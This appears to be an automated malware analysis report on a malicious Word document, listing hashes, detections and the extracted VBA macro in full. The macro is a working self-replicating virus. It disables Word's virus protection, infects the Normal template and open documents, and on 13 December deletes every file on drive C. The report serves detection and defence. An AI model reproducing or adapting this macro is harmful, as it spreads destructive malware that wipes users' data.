Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 84447e8ccb1c89b2…

MALICIOUS

Office (OLE)

518.0 KB Created: 2010-09-27 21:26:00 Authoring application: Microsoft Word 11.6.0 First seen: 2017-12-24
MD5: e761fda4a846480c200983832efb85f0 SHA-1: 3b14ed82b2976f53f7831f6175132f2c4f942353 SHA-256: 84447e8ccb1c89b24fa98e277e39b7b2d76bf6fe6e4e120018106153ae13ec66
182 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic

The file is a malicious Office document containing VBA macros, specifically a Document_Open macro, which is a common technique for initial execution. The macro attempts to disable virus protection and potentially download or execute further payloads, as indicated by the ClamAV detection 'Doc.Trojan.Thus-5'. The embedded URL is likely part of the lure or a secondary stage, though its reputation is unknown.

Heuristics 4

  • ClamAV: Doc.Trojan.Thus-5 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Thus-5
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.eduplace.com/rdg/res/literacy/in_read2.html In document text (OLE body)

Extracted artifacts 7

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2349 bytes
SHA-256: 4d6ffbf1ce6d9ebed42ab7a42f75864de3ec72838ccae692fcbd5aafa240f247
Detection
ClamAV: Doc.Trojan.Thus-5
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
'Thus_001'
    On Error Resume Next
    Application.Options.VirusProtection = False
    If NormalTemplate.VBProject.VBComponents.Item(1).codemodule.Lines(2, 1) <> "'Thus_001'" Then
    NormalTemplate.VBProject.VBComponents.Item(1).codemodule _
    .deletelines 1, NormalTemplate.VBProject.VBComponents.Item(1) _
    .codemodule.CountOfLines
    End If
    If NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines = 0 Then
    NormalTemplate.VBProject.VBComponents.Item(1).codemodule _
    .InsertLines 1, ActiveDocument.VBProject.VBComponents.Item(1) _
    .codemodule.Lines(1, ActiveDocument.VBProject.VBComponents _
    .Item(1).codemodule.CountOfLines)
    End If
    If NormalTemplate.Saved = False Then NormalTemplate.Save
    For k = 1 To Application.Documents.Count
    If Application.Documents.Item(k).VBProject.VBComponents.Item(1).codemodule.Lines(2, 1) <> "'Thus_001'" Then
    Application.Documents.Item(k).VBProject.VBComponents.Item(1) _
    .codemodule.deletelines 1, Application.Documents.Item(k) _
    .VBProject.VBComponents.Item(1).codemodule.CountOfLines
    End If
    If Application.Documents.Item(k).VBProject.VBComponents.Item(1).codemodule.CountOfLines = 0 Then
    Application.Documents.Item(k).VBProject.VBComponents.Item(1) _
    .codemodule.InsertLines 1, NormalTemplate.VBProject.VBComponents _
    .Item(1).codemodule.Lines(1, NormalTemplate.VBProject _
    .VBComponents.Item(1).codemodule.CountOfLines)
    End If
    Next k
    If (Day(Now()) = 13) And (Month(Now()) = 12) Then
    With Application.FileSearch
        .NewSearch
        .LookIn = "C:\"
        .SearchSubFolders = True
        .FileName = "*.*"
        .MatchTextExactly = False
        .FileType = msoFileTypeAllFiles
        If .Execute > 0 Then
        For i = 1 To .FoundFiles.Count
        Kill .FoundFiles(i)
        Next i
        End If
    End With
    End If
End Sub
Private Sub Document_Close()
    Document_Open
End Sub
Private Sub Document_New()
    Document_Open
End Sub
ole10native_00.bin ole-package OLE Ole10Native stream: ObjectPool/_936362321/Ole10Native 896 bytes
SHA-256: b06ffaf9eae28b7dace6f927dde8b9fc7b5d945d5dcfcfea2057c3dafe7869b4
ole10native_01.bin ole-package OLE Ole10Native stream: ObjectPool/_936362436/Ole10Native 896 bytes
SHA-256: 48f305f7d88ce33084affc294d561bd153c8bcf7c2859d9d6ed0463173064823
ole10native_02.bin ole-package OLE Ole10Native stream: ObjectPool/_936362482/Ole10Native 896 bytes
SHA-256: e2ba49c76f884b290d6b83029fb013c36ec7f88d020848ef2ce133ba7ae3857a
ole10native_03.bin ole-package OLE Ole10Native stream: ObjectPool/_936556745/Ole10Native 896 bytes
SHA-256: 4164b988e58a03a52410becf83080a8f521e6de9db7a1cccf4a08feaf12a2482
ole10native_04.bin ole-package OLE Ole10Native stream: ObjectPool/_968964003/Ole10Native 896 bytes
SHA-256: 8c35c9571297dfc08fc8c4008376e98b085caffec97a41925d22f99070714776
ole10native_05.bin ole-package OLE Ole10Native stream: ObjectPool/_968964107/Ole10Native 896 bytes
SHA-256: 9889b8a780141f05f7893fa3cc1d4e49425d1c7066083685f7cc4ca9ca9fab43

Open this report in the interactive analyzer, or submit your own file for analysis.